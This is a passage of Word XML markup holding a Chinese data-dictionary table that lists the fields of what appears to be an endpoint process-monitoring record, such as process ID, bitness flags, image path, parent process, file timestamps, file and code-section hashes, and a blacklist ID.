          <w:p w14:paraId="720F7E12" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>创建时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1A39D685" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4433E5E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>b_wow64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1606928D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1530EC57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10E7732A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>32位进程在64位系统标志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0D509F19" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37E77200" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>process_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="450D40FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="288325B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A49D3D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0D979A45" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68F43A33" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>b_64bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C69B899" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EDBD25E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52226C0A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>64进程标志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F44EC0A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C060C5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>image_file_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F14B6E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38B8BBF1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="220EDD1A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程映像文件的全路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="61D22D27" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="021FFAF4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parent_process_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FEB026A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15C85097" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40C85E30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="406D57E2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="571B2994" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>f_size</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4816E8A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31E76ED6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1693D55F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="17BFC69F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DD13FAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F84FA76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B894B32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D169E32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件所有者</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="224754E9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33338F50" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C0DC9D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="180494B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02CA345C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>32/64/空 表示 32位文件，64位文件，空未知</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7B87EF26" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25913DEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_ctime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="500157F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E9827F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E4155DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件create time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="56C44E1F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28EE8C47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_mtime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="628842DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="207994D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="734FC84E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件modify time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4A6CF0C4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43F5E9C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_atime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C16746C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="147D3A1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="232B2D13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件access time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="424545A9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="505D7840" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CDB226B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DC41D50" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17A579FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="46C9F85A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="768E3610" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48BD0391" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="163E9FFB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B8C0C8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4934CC72" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D497607" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1641C283" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73CFD881" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07B1C08E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2E19851D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0994087C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code_section_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F163313" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61B211F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0767A45F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代码段MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="78DCDDD3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="241470A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code_section_sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F322BE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02CA2A96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20D079C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代码段sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="78D221EC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C36D546" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code_section_sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EA0AE60" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="254E91D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="523C92A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代码段sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="71253304" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="306C491B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>black_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="453D59B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DA79134" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
